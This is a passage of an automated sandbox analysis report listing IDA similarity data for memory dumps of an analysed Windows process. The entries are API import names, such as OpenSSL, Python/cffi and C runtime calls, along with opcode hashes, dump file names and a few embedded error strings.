                                                                                                                                                                                                                                          • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_initialize_crt__scrt_release_startup_lock
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 349153199-0
                                                                                                                                                                                                                                          • Opcode ID: 57c0d09637674abbf95f21557d567e36662b0b87bb650a17be1757865c6db19c
                                                                                                                                                                                                                                          • Instruction ID: fcf75d30b449e61b861a2c62a70c3f90e1cc132a52c513722c7a072f8c16fab3
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 57c0d09637674abbf95f21557d567e36662b0b87bb650a17be1757865c6db19c
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: FB819061E0CE43C6FA94AB669CB12F962E0AF457E0F144339E90E47796DE3DF4458701
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • memset.VCRUNTIME140(?,?,?,?,?,?,?,00007FF81DC825AD), ref: 00007FF81DC8260C
                                                                                                                                                                                                                                          • calloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?,?,?,00007FF81DC825AD), ref: 00007FF81DC82618
                                                                                                                                                                                                                                          • memset.VCRUNTIME140(?,?,?,?,?,?,?,00007FF81DC825AD), ref: 00007FF81DC82668
                                                                                                                                                                                                                                          • calloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?,?,?,00007FF81DC825AD), ref: 00007FF81DC82674
                                                                                                                                                                                                                                          • InitializeCriticalSection.KERNEL32 ref: 00007FF81DC8269A
                                                                                                                                                                                                                                          • InitializeConditionVariable.KERNEL32 ref: 00007FF81DC826A7
                                                                                                                                                                                                                                          • InitializeConditionVariable.KERNEL32 ref: 00007FF81DC826B4
                                                                                                                                                                                                                                          • memset.VCRUNTIME140 ref: 00007FF81DC826F1
                                                                                                                                                                                                                                          • calloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF81DC826FD
                                                                                                                                                                                                                                            • Part of subcall function 00007FF81DC82790: EnterCriticalSection.KERNEL32(?,?,?,?,?,?,00000000,00007FF81DC82780), ref: 00007FF81DC827AF
                                                                                                                                                                                                                                            • Part of subcall function 00007FF81DC82790: LeaveCriticalSection.KERNEL32 ref: 00007FF81DC827C3
                                                                                                                                                                                                                                            • Part of subcall function 00007FF81DC82790: WakeAllConditionVariable.KERNEL32 ref: 00007FF81DC827D0
                                                                                                                                                                                                                                            • Part of subcall function 00007FF81DC82790: WakeAllConditionVariable.KERNEL32 ref: 00007FF81DC827DD
                                                                                                                                                                                                                                            • Part of subcall function 00007FF81DC82790: WaitForSingleObject.KERNEL32 ref: 00007FF81DC82815
                                                                                                                                                                                                                                            • Part of subcall function 00007FF81DC82790: CloseHandle.KERNEL32 ref: 00007FF81DC82820
                                                                                                                                                                                                                                            • Part of subcall function 00007FF81DC82790: GetLastError.KERNEL32 ref: 00007FF81DC8282E
                                                                                                                                                                                                                                            • Part of subcall function 00007FF81DC82790: DeleteCriticalSection.KERNEL32 ref: 00007FF81DC8284B
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000030.00000002.1566630025.00007FF81DC81000.00000020.00000001.01000000.0000004C.sdmp, Offset: 00007FF81DC80000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1566533062.00007FF81DC80000.00000002.00000001.01000000.0000004C.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1566733514.00007FF81DCF0000.00000002.00000001.01000000.0000004C.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1566834430.00007FF81DCFC000.00000004.00000001.01000000.0000004C.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1566886856.00007FF81DCFD000.00000008.00000001.01000000.0000004C.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1566941654.00007FF81DCFE000.00000004.00000001.01000000.0000004C.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1566971006.00007FF81DCFF000.00000002.00000001.01000000.0000004C.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_48_2_7ff81dc80000_RuntimeusererVers.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ConditionCriticalSectionVariable$Initializecallocmemset$Wake$CloseDeleteEnterErrorHandleLastLeaveObjectSingleWait
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 708475683-0
                                                                                                                                                                                                                                          • Opcode ID: bb3fcba4a768b6f5dfd495e022c2bc2d456dfefaf024495bd1f501c25eca83fd
                                                                                                                                                                                                                                          • Instruction ID: 62d5259850732482afb3eebb293d1e712a695a48d13085bcd42e88785cdb24f9
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: bb3fcba4a768b6f5dfd495e022c2bc2d456dfefaf024495bd1f501c25eca83fd
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 32516C23A15F4186EB418F66E8847A9A3A6FF85BD4F048A35DE4E07799EF3CD4428740
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000030.00000002.1583070422.00007FF81E501000.00000020.00000001.01000000.00000036.sdmp, Offset: 00007FF81E500000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1583033638.00007FF81E500000.00000002.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1583104278.00007FF81E51C000.00000002.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1583140748.00007FF81E529000.00000004.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1583198579.00007FF81E52F000.00000002.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_48_2_7ff81e500000_RuntimeusererVers.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Object_$Buffer_Release$BufferClearErr_Instance
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 3750329280-0
                                                                                                                                                                                                                                          • Opcode ID: 52296bc9277d9992ece3bb50deeb2cc21a86d407979588583c677bef3b0789e8
                                                                                                                                                                                                                                          • Instruction ID: ff8d25b20ccf71f360dd13a218c188e8af16fe928ab42aeb010c88152b2361ce
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 52296bc9277d9992ece3bb50deeb2cc21a86d407979588583c677bef3b0789e8
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: E0414C32B0CE52C2EA688B25ED646F973A1FF84BE4F444631EA4E43654DF2DF9458701
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000030.00000002.1578637831.00007FF81E131000.00000020.00000001.01000000.0000003B.sdmp, Offset: 00007FF81E130000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1578429679.00007FF81E130000.00000002.00000001.01000000.0000003B.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1578694735.00007FF81E13D000.00000002.00000001.01000000.0000003B.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1578785676.00007FF81E14E000.00000004.00000001.01000000.0000003B.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1578942677.00007FF81E14F000.00000008.00000001.01000000.0000003B.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1579030056.00007FF81E154000.00000004.00000001.01000000.0000003B.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1579098759.00007FF81E155000.00000002.00000001.01000000.0000003B.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_48_2_7ff81e130000_RuntimeusererVers.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: L_sk_num$L_get_ciphersL_get_client_ciphersL_sk_findL_sk_valueList_
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 1815754784-0
                                                                                                                                                                                                                                          • Opcode ID: 1797babeb595a320439904016eb88a06c33ece8ccd2e55f1dd80544df9d3188b
                                                                                                                                                                                                                                          • Instruction ID: 5d376d51ed4431b6d3865777d05d92d792affad235b9eb7e67ce52b41e1964cf
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 1797babeb595a320439904016eb88a06c33ece8ccd2e55f1dd80544df9d3188b
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 46312661A0AF4281FA149B62A95413977A1EF88FF2B580635CE0E47768DF3CF4D28340
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000030.00000002.1577633708.00007FF81E081000.00000020.00000001.01000000.0000003C.sdmp, Offset: 00007FF81E080000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1577554084.00007FF81E080000.00000002.00000001.01000000.0000003C.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1577633708.00007FF81E0F4000.00000020.00000001.01000000.0000003C.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1577887521.00007FF81E0F6000.00000002.00000001.01000000.0000003C.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1578021546.00007FF81E119000.00000008.00000001.01000000.0000003C.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1578087716.00007FF81E11D000.00000004.00000001.01000000.0000003C.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1578182269.00007FF81E11E000.00000002.00000001.01000000.0000003C.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1578182269.00007FF81E124000.00000002.00000001.01000000.0000003C.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1578182269.00007FF81E12B000.00000002.00000001.01000000.0000003C.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_48_2_7ff81e080000_RuntimeusererVers.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: P_resp_count$E_freeL_sk_new_nullP_freeP_get1_ext_d2iP_resp_get0P_response_get1_basicR_put_errorT_freed2i_
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 4245524859-0
                                                                                                                                                                                                                                          • Opcode ID: 741c6e6be6a0707780ebfb8c2d7050555c9a934290be2e2d2d38b17e810f51c1
                                                                                                                                                                                                                                          • Instruction ID: 0bed7fa6d795817199608691f56af7a1a58aae636a14a3e3d8f453cec291ca19
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 741c6e6be6a0707780ebfb8c2d7050555c9a934290be2e2d2d38b17e810f51c1
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: BE21E211F0DF1742ED28A666A451A7953D0BF88BE4F050231FD4D87782EE7CF8428340
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000030.00000002.1578637831.00007FF81E131000.00000020.00000001.01000000.0000003B.sdmp, Offset: 00007FF81E130000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1578429679.00007FF81E130000.00000002.00000001.01000000.0000003B.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1578694735.00007FF81E13D000.00000002.00000001.01000000.0000003B.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1578785676.00007FF81E14E000.00000004.00000001.01000000.0000003B.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1578942677.00007FF81E14F000.00000008.00000001.01000000.0000003B.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1579030056.00007FF81E154000.00000004.00000001.01000000.0000003B.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1579098759.00007FF81E155000.00000002.00000001.01000000.0000003B.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_48_2_7ff81e130000_RuntimeusererVers.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: L_sk_num$L_freeL_get_ciphersL_newL_sk_valueList_R_clear_errorR_peek_last_error
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 722909353-0
                                                                                                                                                                                                                                          • Opcode ID: ab61af5903afd015aee955681b9d704805431bd687039dde775b79fdad238801
                                                                                                                                                                                                                                          • Instruction ID: 644ef3f742fd44f150204c6646924c9cd07f1358238c20f2132407cee05b63db
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: ab61af5903afd015aee955681b9d704805431bd687039dde775b79fdad238801
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 4C212C61A09F4286FA189F66A85413A77A0EF88FF2B444734CE4E47B54DF3CF4818300
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000030.00000002.1583070422.00007FF81E501000.00000020.00000001.01000000.00000036.sdmp, Offset: 00007FF81E500000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1583033638.00007FF81E500000.00000002.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1583104278.00007FF81E51C000.00000002.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1583140748.00007FF81E529000.00000004.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1583198579.00007FF81E52F000.00000002.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_48_2_7ff81e500000_RuntimeusererVers.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Dealloc$Dict_Item$Bytes_FromObject_SizeStringTrackmemcpy
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 1819324212-0
                                                                                                                                                                                                                                          • Opcode ID: 74e05990ea2611619d5fa58877a1fa03dec95edcdb20d06c81538b0b1cd151dc
                                                                                                                                                                                                                                          • Instruction ID: 86a8e53ba86fcb6d7f30f2c5f83eb54597b9271dc18cbddb364a87760c75ab07
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 74e05990ea2611619d5fa58877a1fa03dec95edcdb20d06c81538b0b1cd151dc
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 4D21F571A08E52C1EA589B62ED741B963A0AF89FF0F084635EE4E47B58DE2DF5418300
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000030.00000002.1577633708.00007FF81E081000.00000020.00000001.01000000.0000003C.sdmp, Offset: 00007FF81E080000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1577554084.00007FF81E080000.00000002.00000001.01000000.0000003C.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1577633708.00007FF81E0F4000.00000020.00000001.01000000.0000003C.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1577887521.00007FF81E0F6000.00000002.00000001.01000000.0000003C.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1578021546.00007FF81E119000.00000008.00000001.01000000.0000003C.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1578087716.00007FF81E11D000.00000004.00000001.01000000.0000003C.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1578182269.00007FF81E11E000.00000002.00000001.01000000.0000003C.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1578182269.00007FF81E124000.00000002.00000001.01000000.0000003C.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1578182269.00007FF81E12B000.00000002.00000001.01000000.0000003C.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_48_2_7ff81e080000_RuntimeusererVers.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: O_set_flags$O_set_retry_reason$O_clear_flagsO_get_retry_reason
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 3610643084-0
                                                                                                                                                                                                                                          • Opcode ID: 7c2e9297198fbe8bbaa2a4c3eec53a66c110abc671760b54cd415acdbed01445
                                                                                                                                                                                                                                          • Instruction ID: 01a86872a392f926e9cd8aa695e17750412dd5acfe34e2f267aee47b5ecbe4d7
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 7c2e9297198fbe8bbaa2a4c3eec53a66c110abc671760b54cd415acdbed01445
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 3E117C21F0C81642FE18E27A5411A7D53C2FF92BF4F104639E9094BB8BCE2DF9430209
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000030.00000002.1583070422.00007FF81E501000.00000020.00000001.01000000.00000036.sdmp, Offset: 00007FF81E500000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1583033638.00007FF81E500000.00000002.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1583104278.00007FF81E51C000.00000002.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1583140748.00007FF81E529000.00000004.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1583198579.00007FF81E52F000.00000002.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_48_2_7ff81e500000_RuntimeusererVers.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: _errno$Value$DeallocErr_LongLong_Occurredmalloc
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 1551808740-0
                                                                                                                                                                                                                                          • Opcode ID: bc255468c9bbd4d2006561549cf4cc86918cad33357721f0c7f0197e75f0db0e
                                                                                                                                                                                                                                          • Instruction ID: 074520633622e19c689202658692ec85dcec201c14679f626c0148e72eebe50e
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: bc255468c9bbd4d2006561549cf4cc86918cad33357721f0c7f0197e75f0db0e
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 1C113D71E19F0282EA0D8F24AC642B833A0FF49BB4F045334C91E46390EF7DB8948700
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000030.00000002.1577633708.00007FF81E081000.00000020.00000001.01000000.0000003C.sdmp, Offset: 00007FF81E080000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1577554084.00007FF81E080000.00000002.00000001.01000000.0000003C.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1577633708.00007FF81E0F4000.00000020.00000001.01000000.0000003C.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1577887521.00007FF81E0F6000.00000002.00000001.01000000.0000003C.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1578021546.00007FF81E119000.00000008.00000001.01000000.0000003C.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1578087716.00007FF81E11D000.00000004.00000001.01000000.0000003C.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1578182269.00007FF81E11E000.00000002.00000001.01000000.0000003C.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1578182269.00007FF81E124000.00000002.00000001.01000000.0000003C.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1578182269.00007FF81E12B000.00000002.00000001.01000000.0000003C.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_48_2_7ff81e080000_RuntimeusererVers.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Y_id
                                                                                                                                                                                                                                          • String ID: ..\s\ssl\t1_lib.c
                                                                                                                                                                                                                                          • API String ID: 239174422-1643863364
                                                                                                                                                                                                                                          • Opcode ID: c0dd915cbf48b28733fe5b9d9ac6ada7c5cf0a8300dd814d9dde8c03441deb39
                                                                                                                                                                                                                                          • Instruction ID: fe4969e9883fe6ffb289abcd855fa41f373459235268d9293fa6d9de1e57e3d5
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: c0dd915cbf48b28733fe5b9d9ac6ada7c5cf0a8300dd814d9dde8c03441deb39
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: BEB1C072B08A4282EF648A15F854EBD26A0FB547E8F144235EA4D47BD6CE3CF9828705
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000030.00000002.1583070422.00007FF81E501000.00000020.00000001.01000000.00000036.sdmp, Offset: 00007FF81E500000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1583033638.00007FF81E500000.00000002.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1583104278.00007FF81E51C000.00000002.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1583140748.00007FF81E529000.00000004.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1583198579.00007FF81E52F000.00000002.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_48_2_7ff81e500000_RuntimeusererVers.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: memcpy$Err_String
                                                                                                                                                                                                                                          • String ID: ($expected a tuple of ctypes
                                                                                                                                                                                                                                          • API String ID: 629984673-2381509598
                                                                                                                                                                                                                                          • Opcode ID: 33bc14c4c9f715b9f186edb1f575ccfd7cf01ecad4229852a9f585c24573b9c8
                                                                                                                                                                                                                                          • Instruction ID: 3f16ea8fb3fe28fc9d85939e71e840b11a8e3c680f00d363fe9fe26963bae1eb
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 33bc14c4c9f715b9f186edb1f575ccfd7cf01ecad4229852a9f585c24573b9c8
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: C7818672A09F86CAEB258F15E9503B967A5EB157E4F198335DB9D06282EF3CF485C300
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000030.00000002.1583070422.00007FF81E501000.00000020.00000001.01000000.00000036.sdmp, Offset: 00007FF81E500000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1583033638.00007FF81E500000.00000002.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1583104278.00007FF81E51C000.00000002.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1583140748.00007FF81E529000.00000004.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1583198579.00007FF81E52F000.00000002.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_48_2_7ff81e500000_RuntimeusererVers.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID: cannot use <cdata '%s'> in a comparison
                                                                                                                                                                                                                                          • API String ID: 0-3474358591
                                                                                                                                                                                                                                          • Opcode ID: 6aa791130a451b48a0470a5d70d07ac47e0da0f3b06cd743f62ef882f10838de
                                                                                                                                                                                                                                          • Instruction ID: acbf519d4ed10c6245918f85a9a9041bdb4a270b382437c87a7952d30ee7f93c
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 6aa791130a451b48a0470a5d70d07ac47e0da0f3b06cd743f62ef882f10838de
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 61512F36A08F46C2EA658B15ED641B963A0FB45BE8F480632EE0D17BA4CF3DF595C700
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000030.00000002.1583070422.00007FF81E501000.00000020.00000001.01000000.00000036.sdmp, Offset: 00007FF81E500000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1583033638.00007FF81E500000.00000002.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1583104278.00007FF81E51C000.00000002.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1583140748.00007FF81E529000.00000004.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1583198579.00007FF81E52F000.00000002.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_48_2_7ff81e500000_RuntimeusererVers.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID: expected new array length or list/tuple/str, not %.200s$negative array length
                                                                                                                                                                                                                                          • API String ID: 0-630084864
                                                                                                                                                                                                                                          • Opcode ID: 31a9909b8816eb41ccf9ee2eed0d4a58e6ac1d0dd0c424a470d51bb8caeecc0d
                                                                                                                                                                                                                                          • Instruction ID: a4d359beeecac0c4281ac30e6ce9dcc9723968f3fb44b13d7412fd3b7c7394e0
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 31a9909b8816eb41ccf9ee2eed0d4a58e6ac1d0dd0c424a470d51bb8caeecc0d
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 70313C72B18E41C2EB588F1AF8A05B92360FB88FF4B485331EE2D47795DE2DE4918700
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000030.00000002.1583070422.00007FF81E501000.00000020.00000001.01000000.00000036.sdmp, Offset: 00007FF81E500000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1583033638.00007FF81E500000.00000002.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1583104278.00007FF81E51C000.00000002.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1583140748.00007FF81E529000.00000004.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1583198579.00007FF81E52F000.00000002.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_48_2_7ff81e500000_RuntimeusererVers.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID: number too large$short$sign$stru
                                                                                                                                                                                                                                          • API String ID: 0-689979194
                                                                                                                                                                                                                                          • Opcode ID: 407c0a5522b0707a70797659732a6179c20223dcc37a17b9e932906c35c57da2
                                                                                                                                                                                                                                          • Instruction ID: b58298ba949b8d52b0d340eafe6b0c49c07db940a6db1370247917fd80a91ff4
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 407c0a5522b0707a70797659732a6179c20223dcc37a17b9e932906c35c57da2
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: A3315E72B08A45C6EB654F24D8642BC36A1FB55BB4F018332CA5D022D4DFBCE485C601
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000030.00000002.1583070422.00007FF81E501000.00000020.00000001.01000000.00000036.sdmp, Offset: 00007FF81E500000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1583033638.00007FF81E500000.00000002.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1583104278.00007FF81E51C000.00000002.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1583140748.00007FF81E529000.00000004.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1583198579.00007FF81E52F000.00000002.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
